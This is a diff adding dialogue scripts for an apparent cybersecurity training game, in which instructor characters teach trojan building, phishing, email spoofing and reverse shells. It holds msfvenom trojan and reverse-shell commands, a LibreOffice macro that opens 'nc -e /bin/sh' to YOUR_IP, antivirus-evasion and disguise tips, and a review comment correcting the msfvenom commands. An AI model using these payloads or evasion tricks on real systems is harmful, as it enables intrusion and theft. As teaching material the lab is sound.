Specialist: **Evasion tips:** +- Experiment with different encoders and iteration counts +- Shikata_ga_nai is popular but widely signatured - try others +- Chain multiple encoders for better results +- Use legitimate programs as templates (notepad, calc, small utilities) +- Test against ClamAV before trying against victim +- Don't upload to VirusTotal if you want evasion to last (shares sample with AV vendors) + +Malware Specialist: **Delivery tips:** +- Make filename convincing (game.exe, important_document.exe, update.exe) +- Social engineering matters - victim needs reason to run it +- In real scenarios: icons, file properties, code signing all add legitimacy +- For lab: simple web delivery works fine + +Malware Specialist: **Verification:** +- Windows: `net user` shows created accounts +- Check Admin group: `net localgroup administrators` +- If payload fails, check syntax and password complexity requirements +- Passwords need: uppercase, lowercase, numbers (e.g., SecurePass123) + +Malware Specialist: **Troubleshooting:** +- Payload doesn't work? Test simpler version without encoding +- Still detected by AV? Try different template or more encoding iterations +- Apache won't start? `sudo service apache2 status` for error info +- Can't download from Kali? Check IP address (`ip a`) and firewall rules + +{instructor_rapport >= 50: + Malware Specialist: You've engaged deeply with the material and asked excellent questions. You're well-prepared for the practical exercises. +} + ++ [Back to main menu] + -> malware_hub + +// =========================================== +// READY FOR PRACTICE +// =========================================== + +=== ready_for_practice === +Malware Specialist: Good. You've covered the core concepts. + +Malware Specialist: Lab objectives: +1. Create basic Trojan using msfvenom +2. Test against anti-malware (ClamAV) +3. Use encoding to evade detection +4. Inject payload into legitimate program template +5. 
Deliver via web server to Windows victim +6. Verify successful exploitation + +{ethical_awareness >= 10: + Malware Specialist: You've demonstrated solid ethical awareness. Remember: controlled lab environment, authorized testing only. +} + +Malware Specialist: The skills you're learning are powerful. Metasploit is used by professional penetration testers worldwide. + +Malware Specialist: But also by criminals. The difference is authorization and intent. + +Malware Specialist: You're learning these techniques to defend against them - to understand attacker methods, test organizational defenses, and improve security posture. + +Malware Specialist: One final reminder: creating or deploying malware against unauthorized systems is computer fraud. Felony-level crime. Only use these skills in authorized contexts: penetration testing contracts, security research, education labs, your own isolated systems. + +Malware Specialist: Now go create some Trojans. Good luck, Agent {player_name}. + +#exit_conversation +-> END diff --git a/story_design/ink/game_scenarios/phishing_social_engineering.ink b/story_design/ink/game_scenarios/phishing_social_engineering.ink new file mode 100644 index 0000000..fc690ef --- /dev/null +++ b/story_design/ink/game_scenarios/phishing_social_engineering.ink 
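Review bot: in `template_injection` the `-x notepad.exe` example says "Both malicious code AND original program execute", but msfvenom only preserves the template's own behaviour when `-k` (keep) is passed alongside `-x`; as written, `msfvenom -p windows/exec CMD='net user /add hacker pass123' -x notepad.exe -f exe > my_notepad.exe` yields a file that carries the payload inside Notepad's image without launching Notepad, so the "seems normal" claim, repeated in `commands_reference` (`-x template.exe -f exe`) and in `challenge_tips`, does not hold for the command the learner is told to run. Suggest adding `-k` to those lines and one sentence explaining what it does, since the lab's verification step assumes the decoy behaviour is visible. Related: the chained-encoder pipelines in `encoding_evasion`, `template_injection` and `commands_reference` (`msfvenom -p payload -e encoder1 -i 3 | msfvenom -e encoder2 -i 5 -f exe > multi_encoded.exe`) hand raw bytes to a second msfvenom with no payload name, architecture or platform, so that stage cannot tell which encoders or executable template apply; the stdin-reading stage should carry `-a x86 --platform windows`, with `-f raw` on the first stage, which is how the msfvenom documentation itself chains encoders.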
@@ -0,0 +1,967 @@ +// =========================================== +// PHISHING AND SOCIAL ENGINEERING LAB +// Human Factors and Social Engineering +// =========================================== +// Game-Based Learning replacement for lab sheet +// Original: cyber_security_landscape/3_phishing.md +// =========================================== + +// Progress tracking +VAR intro_human_factors_discussed = false +VAR phishing_basics_discussed = false +VAR reconnaissance_discussed = false +VAR email_spoofing_discussed = false +VAR malicious_attachments_discussed = false +VAR macros_discussed = false +VAR executables_discussed = false +VAR reverse_shells_discussed = false +VAR ethics_discussed = false + +// Detailed topics +VAR weakest_link_discussed = false +VAR spear_phishing_discussed = false +VAR attachment_types_discussed = false +VAR macro_creation_discussed = false +VAR msfvenom_discussed = false +VAR netcat_listener_discussed = false + +// Challenge tracking +VAR completed_reconnaissance = false +VAR completed_first_phish = false +VAR completed_spoofing = false +VAR completed_attachment = false + +// Instructor relationship +VAR instructor_rapport = 0 +VAR ethical_awareness_shown = false + +// External variables +EXTERNAL player_name + +// =========================================== +// ENTRY POINT - SOCIAL ENGINEERING SPECIALIST +// =========================================== + +=== start === +~ instructor_rapport = 0 + +Social Engineering Specialist: Welcome, Agent {player_name}. I'm your instructor for human factors and social engineering. + +Social Engineering Specialist: This module covers a critical truth: the human element is often the most exploitable component of any security system. Technical defenses don't matter if an attacker can convince a user to bypass them. + +Social Engineering Specialist: Before we begin—this training covers offensive techniques. Everything we discuss is for authorized security testing within controlled environments. 
These skills exist to help organizations identify and remediate human vulnerabilities. + +Social Engineering Specialist: Clear on that? We're learning these techniques to defend against them, and to conduct authorized penetration tests. + +* [Absolutely. I understand the ethical boundaries] + ~ ethical_awareness_shown = true + ~ instructor_rapport += 15 + You: Understood completely. Authorized testing only, controlled environments, defensive purpose. + Social Engineering Specialist: Perfect. That's exactly the mindset we need. Let's begin. + -> social_engineering_hub +* [Yes, I'm clear on the scope] + ~ instructor_rapport += 5 + You: Clear on the ethical constraints. + Social Engineering Specialist: Good. Remember that throughout. + -> social_engineering_hub + +// =========================================== +// MAIN TRAINING HUB +// =========================================== + +=== social_engineering_hub === + +Social Engineering Specialist: What aspect of social engineering and phishing would you like to cover? 
+ ++ {not intro_human_factors_discussed} [Human factors in cybersecurity] + -> human_factors_intro ++ {not phishing_basics_discussed} [Phishing attack fundamentals] + -> phishing_basics ++ {not reconnaissance_discussed} [Reconnaissance and information gathering] + -> reconnaissance_intro ++ {not email_spoofing_discussed} [Email spoofing techniques] + -> email_spoofing_intro ++ {not malicious_attachments_discussed} [Creating malicious attachments] + -> malicious_attachments_intro ++ {not reverse_shells_discussed} [Reverse shells and remote access] + -> reverse_shells_intro ++ {phishing_basics_discussed and malicious_attachments_discussed} [Show me the attack workflow] + -> attack_workflow ++ {ethics_discussed or ethical_awareness_shown} [Practical challenge tips] + -> challenge_tips ++ {not ethics_discussed} [Ethical considerations and defensive applications] + -> ethics_discussion ++ [I'm ready to start the simulation] + -> ready_for_simulation ++ [That's all for now] + -> end_session + +// =========================================== +// HUMAN FACTORS IN CYBERSECURITY +// =========================================== + +=== human_factors_intro === +~ intro_human_factors_discussed = true +~ instructor_rapport += 5 + +Social Engineering Specialist: Human factors. The foundation of social engineering attacks. + +Social Engineering Specialist: Technical security can be excellent—strong encryption, patched systems, robust firewalls. But all of that can be bypassed if you can convince a human to let you in. + +Social Engineering Specialist: Users have mental models of security and risk. Attackers exploit gaps between those models and reality. If a user doesn't perceive danger, they won't apply security measures. + +Social Engineering Specialist: The classic saying: "The user is the weakest link." It's true, but also incomplete. 
Users aren't inherently weak—they're often inadequately trained, using poorly designed security systems, under time pressure, making snap decisions. + +* [Why do humans fall for these attacks?] + ~ weakest_link_discussed = true + You: What makes humans so vulnerable to social engineering? + -> human_vulnerabilities +* [How do we defend against this?] + You: If humans are vulnerable, how do we protect systems? + -> human_factors_defense +* [I see—target the human, not the system] + -> social_engineering_hub + +=== human_vulnerabilities === +~ instructor_rapport += 10 + +Social Engineering Specialist: Excellent question. Multiple factors make humans vulnerable: + +Social Engineering Specialist: **Psychology**: Humans are wired for trust and helpfulness. We want to assist others. Attackers exploit that. + +Social Engineering Specialist: **Cognitive biases**: Authority bias makes us trust official-looking messages. Urgency causes us to skip security checks. Curiosity makes us click suspicious links. + +Social Engineering Specialist: **Complexity**: Security systems are often complicated and user-hostile. When security gets in the way of work, users find workarounds. + +Social Engineering Specialist: **Information asymmetry**: Attackers know tricks users don't. A well-crafted phishing email can be nearly indistinguishable from legitimate correspondence. + +Social Engineering Specialist: **Scale**: Attackers can send thousands of phishing emails. They only need one person to click. The defender has to get it right every time. + +~ instructor_rapport += 5 +-> social_engineering_hub + +=== human_factors_defense === +~ instructor_rapport += 10 + +Social Engineering Specialist: Good instinct. Defense requires layered approaches: + +Social Engineering Specialist: **Security awareness training**: Educate users about phishing indicators, social engineering tactics, and safe behaviors. Make them part of the defense. 
+ +Social Engineering Specialist: **Usable security**: Design security systems that are intuitive and don't obstruct legitimate work. Security that's too burdensome will be circumvented. + +Social Engineering Specialist: **Technical controls**: Email filtering, attachment sandboxing, multi-factor authentication. Don't rely solely on human vigilance. + +Social Engineering Specialist: **Culture**: Create organizational culture where questioning suspicious requests is encouraged, not punished. Users should feel safe reporting potential phishing. + +Social Engineering Specialist: **Regular testing**: Conduct simulated phishing campaigns to identify vulnerable users and improve training. What we're doing here—authorized, controlled testing. + +~ instructor_rapport += 10 +-> social_engineering_hub + +// =========================================== +// PHISHING BASICS +// =========================================== + +=== phishing_basics === +~ phishing_basics_discussed = true +~ instructor_rapport += 5 + +Social Engineering Specialist: Phishing. One of the most effective attack vectors in cybersecurity. + +Social Engineering Specialist: Phishing is social engineering via electronic communication—typically email. The attacker crafts a message designed to trick the recipient into: +- Revealing sensitive information (credentials, financial data) +- Clicking malicious links (web attacks, credential harvesting) +- Opening malicious attachments (malware installation) + +Social Engineering Specialist: This lab focuses on the attachment vector. Getting a victim to execute malicious code by opening a document or program. + +Social Engineering Specialist: Once they open that attachment, the attacker gains access to their system. From there: data theft, lateral movement, persistent access. + +* [Tell me about spear phishing] + ~ spear_phishing_discussed = true + You: What's the difference between phishing and spear phishing? 
+ -> spear_phishing_explanation +* [How successful are phishing attacks?] + You: Do these attacks actually work in practice? + -> phishing_success_rates +* [What makes a phishing email convincing?] + You: How do attackers make emails look legitimate? + -> convincing_phishing +* [Understood] + -> social_engineering_hub + +=== spear_phishing_explanation === +~ instructor_rapport += 10 + +Social Engineering Specialist: Important distinction. + +Social Engineering Specialist: **Phishing**: Broad, untargeted attacks. Send millions of generic emails, hope a small percentage responds. Spray and pray approach. + +Social Engineering Specialist: **Spear phishing**: Targeted attacks against specific individuals or organizations. Attacker researches the target, customizes the message, references real information. + +Social Engineering Specialist: Spear phishing is dramatically more effective. When an email mentions your colleague by name, references a real project, comes from what appears to be a trusted source—much harder to detect. + +Social Engineering Specialist: This lab simulates spear phishing. You'll research targets, craft personalized messages, exploit relationships and trust. + +Social Engineering Specialist: In real-world APT (Advanced Persistent Threat) attacks, spear phishing is often the initial compromise. High-value targets get carefully researched, precisely targeted emails. + +~ instructor_rapport += 10 +-> social_engineering_hub + +=== phishing_success_rates === +~ instructor_rapport += 8 + +Social Engineering Specialist: Disturbingly successful. 
+ +Social Engineering Specialist: Industry studies show phishing success rates vary widely, but typical ranges: +- 10-30% of recipients open phishing emails +- 5-15% click malicious links or open attachments +- Even with training, 2-5% still fall for sophisticated phishing + +Social Engineering Specialist: That might sound low, but in an organization with 1000 employees, that's 20-50 successful compromises from a single campaign. + +Social Engineering Specialist: Spear phishing success rates are much higher—30-45% click rates are common. Highly personalized attacks can achieve 60%+ success. + +Social Engineering Specialist: The economics favor attackers: sending 10,000 phishing emails costs nearly nothing. Even 1% success is profitable. + +Social Engineering Specialist: And one successful compromise can be enough. One executive's email account, one developer's credentials, one system admin's access—that's your foothold. + +~ instructor_rapport += 8 +-> social_engineering_hub + +=== convincing_phishing === +~ instructor_rapport += 10 + +Social Engineering Specialist: The art of the convincing phish. Several key elements: + +Social Engineering Specialist: **Legitimate-looking sender**: Spoofed email addresses from trusted domains. We'll cover technical spoofing shortly. + +Social Engineering Specialist: **Personalization**: Use target's name, reference their role, mention real colleagues or projects. + +Social Engineering Specialist: **Context and pretext**: Create plausible reason for contact. "Financial report for review," "urgent HR policy update," "document you requested." + +Social Engineering Specialist: **Professional presentation**: Proper grammar, corporate branding, official-looking signatures. Amateur phishing is easy to spot—professional phishing is not. + +Social Engineering Specialist: **Appropriate attachments**: Send document types the target would expect to receive. Accountants get spreadsheets, lawyers get legal documents, designers get graphics. 
+ +Social Engineering Specialist: **Psychological triggers**: Authority (from executive), urgency (immediate action needed), fear (account suspended), curiosity (confidential information). + +Social Engineering Specialist: Combine these elements, and you create emails that even security-aware users might trust. + +~ instructor_rapport += 10 +-> social_engineering_hub + +// =========================================== +// RECONNAISSANCE +// =========================================== + +=== reconnaissance_intro === +~ reconnaissance_discussed = true +~ instructor_rapport += 5 + +Social Engineering Specialist: Reconnaissance. The foundation of targeted attacks. + +Social Engineering Specialist: Before crafting phishing emails, you need intelligence: employee names, email addresses, roles, relationships, interests. + +Social Engineering Specialist: In this simulation, you'll browse a target organization's website. In real operations, reconnaissance is much broader: + +Social Engineering Specialist: **OSINT (Open Source Intelligence)**: LinkedIn profiles, company websites, social media, press releases, job postings, conference presentations. + +Social Engineering Specialist: **Email pattern analysis**: Most organizations follow predictable patterns. firstname.lastname@company.com, flastname@company.com, etc. + +Social Engineering Specialist: **Relationship mapping**: Who works with whom? Who reports to whom? Who's friends outside work? + +Social Engineering Specialist: **Interest identification**: What are targets passionate about? Sports teams, hobbies, causes? These can be social engineering hooks. + +* [How much reconnaissance is typical?] + You: How long do attackers spend on reconnaissance? + -> recon_timeframes +* [What tools help with OSINT?] + You: Are there tools that automate information gathering? 
+ -> osint_tools +* [Got it—gather intelligence first] + ~ completed_reconnaissance = true + -> social_engineering_hub + +=== recon_timeframes === +~ instructor_rapport += 8 + +Social Engineering Specialist: Depends on the operation and target value. + +Social Engineering Specialist: **Opportunistic attacks**: Minimal reconnaissance. Attacker identifies employee email addresses and sends generic phishing. Hours or less. + +Social Engineering Specialist: **Targeted campaigns**: Days to weeks. Research key employees, understand organizational structure, identify high-value targets. + +Social Engineering Specialist: **APT operations**: Months. Nation-state actors conducting espionage might spend extensive time profiling targets, mapping networks, planning multi-stage operations. + +Social Engineering Specialist: The more valuable the target, the more reconnaissance is justified. Compromising a Fortune 500 CEO's email? Weeks of careful research is worthwhile. + +Social Engineering Specialist: For this lab, you'll spend 15-30 minutes on reconnaissance. Enough to understand the organization and personalize attacks, but compressed for training purposes. + +~ instructor_rapport += 5 +~ completed_reconnaissance = true +-> social_engineering_hub + +=== osint_tools === +~ instructor_rapport += 10 + +Social Engineering Specialist: Many tools assist OSINT: + +Social Engineering Specialist: **theHarvester**: Scrapes search engines, social media for email addresses and names associated with a domain. + +Social Engineering Specialist: **Maltego**: Visual link analysis. Maps relationships between people, companies, domains, infrastructure. + +Social Engineering Specialist: **recon-ng**: Framework for web reconnaissance. Modules for gathering information from various sources. + +Social Engineering Specialist: **SpiderFoot**: Automated OSINT gathering from 100+ sources. 
+ +Social Engineering Specialist: **LinkedIn, Facebook, Twitter**: Directly browsing social media often reveals extensive information. People share surprising amounts publicly. + +Social Engineering Specialist: **Google dorking**: Advanced search operators to find exposed information. site:target.com filetype:pdf reveals documents, for example. + +Social Engineering Specialist: **Shodan**: Search engine for internet-connected devices. Find exposed services and infrastructure. + +Social Engineering Specialist: For this exercise, you'll manually browse the target website. Simple, but effective for understanding the process. + +~ instructor_rapport += 10 +~ completed_reconnaissance = true +-> social_engineering_hub + +// =========================================== +// EMAIL SPOOFING +// =========================================== + +=== email_spoofing_intro === +~ email_spoofing_discussed = true +~ instructor_rapport += 5 + +Social Engineering Specialist: Email spoofing. Fundamental to convincing phishing. + +Social Engineering Specialist: Email protocols (SMTP) have a critical flaw: the "From" address is not authenticated. You can claim to be anyone. + +Social Engineering Specialist: When you send an email, you specify the sender address. Nothing inherently prevents you from specifying someone else's address. + +Social Engineering Specialist: This is why phishing can appear to come from trusted sources—colleagues, executives, IT departments, banks. + +Social Engineering Specialist: Modern defenses exist: SPF, DKIM, DMARC—technologies that authenticate sender domains. But implementation is inconsistent, and many organizations haven't deployed them properly. + +* [Tell me about SPF/DKIM/DMARC] + You: How do those authentication technologies work? + -> email_authentication +* [How do I spoof emails in this lab?] + You: What's the technique for spoofing sender addresses? + -> spoofing_technique +* [Why hasn't this been fixed?] 
+ You: If this is a known problem, why hasn't email been redesigned? + -> email_design_problems +* [Understood—email spoofing is possible] + ~ completed_spoofing = true + -> social_engineering_hub + +=== email_authentication === +~ instructor_rapport += 10 + +Social Engineering Specialist: Good question. Email authentication mechanisms: + +Social Engineering Specialist: **SPF (Sender Policy Framework)**: DNS record specifying which mail servers are authorized to send email for a domain. Receiving servers check if email came from authorized server. + +Social Engineering Specialist: **DKIM (DomainKeys Identified Mail)**: Cryptographic signature attached to emails. Proves email wasn't modified in transit and came from declared domain. + +Social Engineering Specialist: **DMARC (Domain-based Message Authentication, Reporting, Conformance)**: Policy framework built on SPF and DKIM. Tells receiving servers what to do with emails that fail authentication—reject, quarantine, or accept with warning. + +Social Engineering Specialist: When properly implemented, these make spoofing much harder. But "properly implemented" is key. + +Social Engineering Specialist: Many organizations haven't configured DMARC. Many email servers don't strictly enforce these policies. Spoofing remains viable in many scenarios. + +~ instructor_rapport += 10 +-> social_engineering_hub + +=== spoofing_technique === +~ instructor_rapport += 8 + +Social Engineering Specialist: In this lab, spoofing is straightforward. + +Social Engineering Specialist: In Thunderbird email client, you can customize the "From" address. Click the dropdown next to your address, select "Customize From Address," and enter whatever you want. + +Social Engineering Specialist: In the simulation, this works seamlessly—no authentication checks. In real environments, spoofing might be blocked by email server policies or recipient filtering. 
+ +Social Engineering Specialist: Other spoofing approaches: +- Using SMTP directly with telnet or specialized tools +- Configuring mail servers with fake sender information +- Exploiting misconfigured email servers that don't require authentication + +Social Engineering Specialist: The simulation simplifies this to focus on social engineering tactics rather than technical bypasses. + +~ completed_spoofing = true +~ instructor_rapport += 5 +-> social_engineering_hub + +=== email_design_problems === +~ instructor_rapport += 10 + +Social Engineering Specialist: Excellent critical thinking. + +Social Engineering Specialist: Email protocols date to early internet days—1980s SMTP. Security wasn't a primary concern. Ease of use and interoperability were priorities. + +Social Engineering Specialist: Redesigning email faces massive challenges: +- **Legacy compatibility**: Billions of systems rely on existing protocols +- **Decentralization**: Email has no central authority to enforce changes +- **Deployment inertia**: Organizations resist upgrading working systems +- **Complexity**: Cryptographic authentication adds complexity users might not understand + +Social Engineering Specialist: SPF/DKIM/DMARC are retrofit solutions—adding authentication to existing protocols. They work, but require universal adoption to be fully effective. + +Social Engineering Specialist: Classic security challenge: replacing widely-deployed insecure systems is incredibly difficult, even when better alternatives exist. + +Social Engineering Specialist: Lesson: technical debt and legacy systems create enduring vulnerabilities. Design security in from the start, because retrofitting is painful. 
+ +~ instructor_rapport += 15 +-> social_engineering_hub + +// =========================================== +// MALICIOUS ATTACHMENTS +// =========================================== + +=== malicious_attachments_intro === +~ malicious_attachments_discussed = true +~ instructor_rapport += 5 + +Social Engineering Specialist: Malicious attachments. The payload delivery mechanism. + +Social Engineering Specialist: Once you've crafted a convincing phishing email, you need a malicious attachment that compromises the target's system when opened. + +Social Engineering Specialist: Three main types we'll cover: +1. **Executable programs**: Compiled malware that runs directly +2. **Office documents with macros**: Word/Excel/LibreOffice files containing malicious scripts +3. **Exploit documents**: Files that exploit vulnerabilities in document readers + +Social Engineering Specialist: The choice depends on your target. Different roles expect different file types. + +* [Tell me about choosing appropriate attachment types] + ~ attachment_types_discussed = true + You: How do I match attachments to targets? + -> attachment_targeting +* [Explain macros in documents] + You: How do office macros work as attack vectors? + -> macro_explanation +* [Show me executable payloads] + You: What about standalone malware programs? + -> executable_payloads +* [I understand the options] + -> social_engineering_hub + +=== attachment_targeting === +~ instructor_rapport += 10 + +Social Engineering Specialist: Matching attachments to targets—critical for success. + +Social Engineering Specialist: **Accountants and finance**: Expect spreadsheets. LibreOffice Calc (.ods) or Excel (.xlsx) with macros. "Quarterly report," "budget analysis," "expense tracking." + +Social Engineering Specialist: **Executives and managers**: Might receive various documents. Word documents (.docx, .odt) with "strategic plan," "board presentation," "confidential memo." 
+ +Social Engineering Specialist: **IT and technical staff**: Might be suspicious of documents, but could receive scripts, logs, or technical reports. Executable tools less suspicious to technical users. + +Social Engineering Specialist: **HR departments**: Resumes, applications, employee documents. Word documents or PDFs. + +Social Engineering Specialist: **General principle**: Send what the target expects to receive in their role. Accountants opening unexpected executables? Suspicious. Accountants opening financial spreadsheets? Routine. + +Social Engineering Specialist: In this simulation, targets have preferences. Some will only open specific file types. Pay attention to their roles and feedback. + +~ instructor_rapport += 10 +~ completed_attachment = true +-> social_engineering_hub + +=== macro_explanation === +~ macros_discussed = true +~ instructor_rapport += 5 + +Social Engineering Specialist: Office macros. Powerful and frequently exploited. + +Social Engineering Specialist: Macros are scripts embedded in office documents—Microsoft Office or LibreOffice. Originally designed for automating document tasks: calculations, formatting, data processing. + +Social Engineering Specialist: Macro languages (Visual Basic for Applications in MS Office, LibreOffice Basic) are full programming languages. They can: +- Execute system commands +- Access files and network resources +- Download and run additional malware +- Steal data + +Social Engineering Specialist: Modern office software warns users about macros. But many users click "Enable Macros" without understanding the risk—especially if the document looks legitimate and they expect to receive it. + +Social Engineering Specialist: Social engineering comes into play: "This document contains macros required to view the content. Please enable macros to continue." + +* [How do I create a malicious macro?] + ~ macro_creation_discussed = true + You: Walk me through creating a macro payload. 
+ -> macro_creation +* [What defenses exist against macro malware?] + You: How do organizations protect against malicious macros? + -> macro_defenses +* [Got the concept] + -> social_engineering_hub + +=== macro_creation === +~ instructor_rapport += 10 + +Social Engineering Specialist: Creating a malicious macro—walkthrough: + +Social Engineering Specialist: **Step 1**: Open LibreOffice Writer or Calc. Tools → Macros → Organize Macros → Basic. + +Social Engineering Specialist: **Step 2**: Create new macro in your document. Click document name, click "New." + +Social Engineering Specialist: **Step 3**: Write the macro code. Example using Shell command to execute system commands: + +Social Engineering Specialist: `Sub Main + Shell("/bin/nc", vbNormalFocus, "-e /bin/sh YOUR_IP 8080") +End Sub` + +Social Engineering Specialist: This creates a reverse shell—connects back to your system with command line access. + +Social Engineering Specialist: **Step 4**: Configure macro to run on document open. Tools → Customize → Events → Open Document → Macro → select your macro. + +Social Engineering Specialist: **Step 5**: Add convincing content to document. Financial data, corporate memo, whatever fits your pretext. + +Social Engineering Specialist: **Step 6**: Save as .odt or .ods. Attach to phishing email. + +Social Engineering Specialist: When victim opens document and enables macros (or if their security is set to low), your payload executes. 
+ +~ instructor_rapport += 10 +~ completed_attachment = true +-> social_engineering_hub + +=== macro_defenses === +~ instructor_rapport += 10 + +Social Engineering Specialist: Macro defenses—layered approach: + +Social Engineering Specialist: **Technical controls:** +- Disable macros by default (most modern office software does this) +- Block macros from internet-sourced documents +- Application whitelisting—only approved programs can execute +- Email gateway scanning for malicious macros + +Social Engineering Specialist: **User training:** +- Educate users never to enable macros in unexpected documents +- Teach users to verify sender through out-of-band communication +- Create culture where users question suspicious documents + +Social Engineering Specialist: **Policy enforcement:** +- Organizational policies prohibiting macro usage except for approved documents +- Removal of macro execution capabilities from standard user systems +- Require code signing for legitimate macros + +Social Engineering Specialist: The challenge: many organizations legitimately use macros for business processes. Completely blocking them disrupts workflow. Balance between usability and security. + +Social Engineering Specialist: Defense-in-depth: combine technical controls, user awareness, and policy. No single measure is perfect. + +~ instructor_rapport += 10 +-> social_engineering_hub + +=== executable_payloads === +~ instructor_rapport += 5 + +Social Engineering Specialist: Executable malware payloads. More direct than macros. + +Social Engineering Specialist: Standalone programs that run malicious code when executed. Typically ELF binaries on Linux, EXE on Windows. + +Social Engineering Specialist: Advantage: No need for user to enable macros. If they run the file, it executes. + +Social Engineering Specialist: Disadvantage: More obviously suspicious. Users might question why they're being sent a program rather than a document. 
+ +Social Engineering Specialist: Works better with technical targets who might expect to receive tools, scripts, or utilities. + +* [How do I create an executable payload?] + ~ msfvenom_discussed = true + You: What tools create malicious executables? + -> msfvenom_payloads +* [How do attackers disguise executables?] + You: How do you make executables look legitimate? + -> executable_disguises +* [Understood] + -> social_engineering_hub + +=== msfvenom_payloads === +~ instructor_rapport += 10 + +Social Engineering Specialist: msfvenom. Metasploit Framework's payload generator. + +Social Engineering Specialist: Creates standalone payloads for various platforms. For Linux targets: + +Social Engineering Specialist: `msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f elf -o malware` + +Social Engineering Specialist: Breaking this down: +- `-a x64` — architecture (64-bit) +- `--platform linux` — target OS +- `-p linux/x64/shell_reverse_tcp` — payload type (reverse shell) +- `LHOST=YOUR_IP` — your IP for callback +- `LPORT=4444` — your listening port +- `-f elf` — output format (Linux executable) +- `-o malware` — output filename + +Social Engineering Specialist: Before sending, set up listener to receive connection: +`nc -lvvp 4444` + +Social Engineering Specialist: When victim runs the malware, it connects back to you. You get command line access to their system. + +Social Engineering Specialist: msfvenom can generate payloads for any platform, architecture, and access method. Incredibly versatile tool. + +~ instructor_rapport += 10 +~ completed_attachment = true +-> social_engineering_hub + +=== executable_disguises === +~ instructor_rapport += 8 + +Social Engineering Specialist: Disguising executables—social engineering and technical tricks: + +Social Engineering Specialist: **Naming**: Use document-like names. "Financial_Report.pdf.exe" (exploiting hidden file extensions on Windows). 
On Linux: "report.sh" looks like a script, more plausible than random binary. + +Social Engineering Specialist: **Icons**: Change executable icon to document icon. Makes files appear to be documents visually. + +Social Engineering Specialist: **Packers and crypters**: Obfuscate executable code to avoid antivirus detection. Tools like UPX, custom packers. + +Social Engineering Specialist: **Legitimate tool abuse**: Package malicious code with legitimate software. "Install this tool to view the document." + +Social Engineering Specialist: **Pretext engineering**: Convince target they need to run the program. "Security update," "codec required," "validation tool." + +Social Engineering Specialist: In practice, getting users to run raw executables is harder than macro documents. But with right pretext and target, it works. + +~ instructor_rapport += 8 +-> social_engineering_hub + +// =========================================== +// REVERSE SHELLS +// =========================================== + +=== reverse_shells_intro === +~ reverse_shells_discussed = true +~ instructor_rapport += 5 + +Social Engineering Specialist: Reverse shells. The goal of attachment-based phishing. + +Social Engineering Specialist: **Normal shell**: You connect TO a remote system. You initiate the connection. + +Social Engineering Specialist: **Reverse shell**: Remote system connects TO you. Victim's machine initiates the connection. + +Social Engineering Specialist: Why reverse? Several advantages: +- Bypasses firewalls (outbound connections usually allowed, inbound blocked) +- No need for victim to have open ports +- Works from behind NAT +- Victim's actions trigger connection + +* [How do reverse shells work technically?] + ~ netcat_listener_discussed = true + You: Explain the technical mechanism. + -> reverse_shell_mechanics +* [What can I do with remote shell access?] + You: Once I have a shell, what's next? 
+ -> post_exploitation_basics +* [Understood the concept] + -> social_engineering_hub + +=== reverse_shell_mechanics === +~ instructor_rapport += 10 + +Social Engineering Specialist: Reverse shell mechanics—simple but elegant: + +Social Engineering Specialist: **Your system (attacker)**: +Set up listener waiting for connections: +`nc -lvvp 4444` + +This listens on port 4444. When victim connects, you get their command line. + +Social Engineering Specialist: **Victim's system**: +Malicious payload runs, connecting back to you: +`nc -e /bin/sh YOUR_IP 4444` + +Or embedded in macro, executable, whatever payload you delivered. + +Social Engineering Specialist: **Result**: +Victim's machine makes outbound connection to your IP:4444. Your listener accepts connection. You now type commands that execute on victim's system. + +Social Engineering Specialist: **Network perspective**: +From network monitoring, looks like victim initiated connection to external IP. Harder to distinguish from legitimate traffic than inbound connection to victim. + +Social Engineering Specialist: Tools like netcat, msfvenom payloads, custom scripts—all create reverse shell connections. + +~ instructor_rapport += 10 +-> social_engineering_hub + +=== post_exploitation_basics === +~ instructor_rapport += 10 + +Social Engineering Specialist: Post-exploitation. What you do after gaining access. + +Social Engineering Specialist: **Initial assessment**: +- `whoami` — what user are you? +- `pwd` — where are you in filesystem? +- `ls -la` — what's in current directory? +- `uname -a` — system information + +Social Engineering Specialist: **Objective completion**: +For this lab: read flag files in home directories. In real operations: depends on goals. 
+ +Social Engineering Specialist: **Common post-exploitation actions**: +- Privilege escalation (gain root/admin access) +- Lateral movement (compromise additional systems) +- Data exfiltration (steal information) +- Persistence (maintain access for future use) +- Covering tracks (delete logs, hide presence) + +Social Engineering Specialist: **Limitations of simple shells**: +Basic netcat shells are fragile—no TTY, limited interaction, easily disconnected. Advanced: upgrade to Meterpreter, SSH tunnel, or other robust access methods. + +Social Engineering Specialist: For this lab, simple shell is sufficient to read flags and demonstrate access. + +~ instructor_rapport += 10 +-> social_engineering_hub + +// =========================================== +// ATTACK WORKFLOW +// =========================================== + +=== attack_workflow === +~ instructor_rapport += 5 + +Social Engineering Specialist: Complete attack workflow for this lab: + +Social Engineering Specialist: **Phase 1 - Reconnaissance**: +- Browse target organization website (accountingnow.com) +- Document employee names, email addresses, roles +- Note potential interests, relationships + +Social Engineering Specialist: **Phase 2 - Payload Preparation**: +- Set up netcat listener: `nc -lvvp 4444` or `nc -lvvp 8080` +- Create malicious attachment: + * Macro document (LibreOffice with Shell command) + * Executable payload (msfvenom) +- Match payload type to target role + +Social Engineering Specialist: **Phase 3 - Email Crafting**: +- Compose phishing email in Thunderbird +- Spoof sender to trusted source (colleague, manager) +- Personalize content (use target's name, reference their role) +- Create plausible pretext for attachment +- Attach malicious file + +Social Engineering Specialist: **Phase 4 - Engagement**: +- Send email +- Monitor for replies (simulation provides feedback) +- Refine approach based on victim responses +- Iterate until victim opens attachment + +Social Engineering Specialist: 
